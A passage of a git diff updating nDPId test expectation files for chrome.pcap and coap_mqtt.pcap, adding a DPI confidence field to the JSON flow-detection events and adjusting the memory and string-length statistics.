+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","total-events-serialized":44}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 5633/5633
@@ -50,10 +50,10 @@
 ~~ total active/idle flows...: 6/6
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4776768 bytes
-~~ total memory freed........: 4776768 bytes
-~~ total allocations/frees...: 105219/105219
+~~ total memory allocated....: 4860081 bytes
+~~ total memory freed........: 4860081 bytes
+~~ total allocations/frees...: 106809/106809
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 910 chars
-~~ json string avg len.......: 605 chars
+~~ json string max len.......: 936 chars
+~~ json string avg len.......: 618 chars
diff --git a/test/results/coap_mqtt.pcap.out b/test/results/coap_mqtt.pcap.out
index 9099a6df9..a7c2705a3 100644
--- a/test/results/coap_mqtt.pcap.out
+++ b/test/results/coap_mqtt.pcap.out
@@ -1,91 +1,91 @@
 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"coap_mqtt.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1333957710293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1333957710293,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nMWMwAg\/RpDAQXKchYzKy53ZWxsLWtub3duBGNvcmU="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1333957715764,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1333957715764,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nQWMwAgAxVDAv\/NchYzKy53ZWxsLWtub3duBGNvcmU="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1333957717200,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1333957717200,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nUWMwAgyuNDAzf9chYzKy53ZWxsLWtub3duBGNvcmU="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1333957718629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1333957718629,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nYWMwAgvHpDBEZkchYzKy53ZWxsLWtub3duBGNvcmU="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1333957720773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"ts_msec":1333957720773,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACQRQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7ncWMwAkKH5FAYp0chYzKy53ZWxsLWtub3duBGNvcmUQEj3U"}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"COAP","breed":"Safe","category":"RPC"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
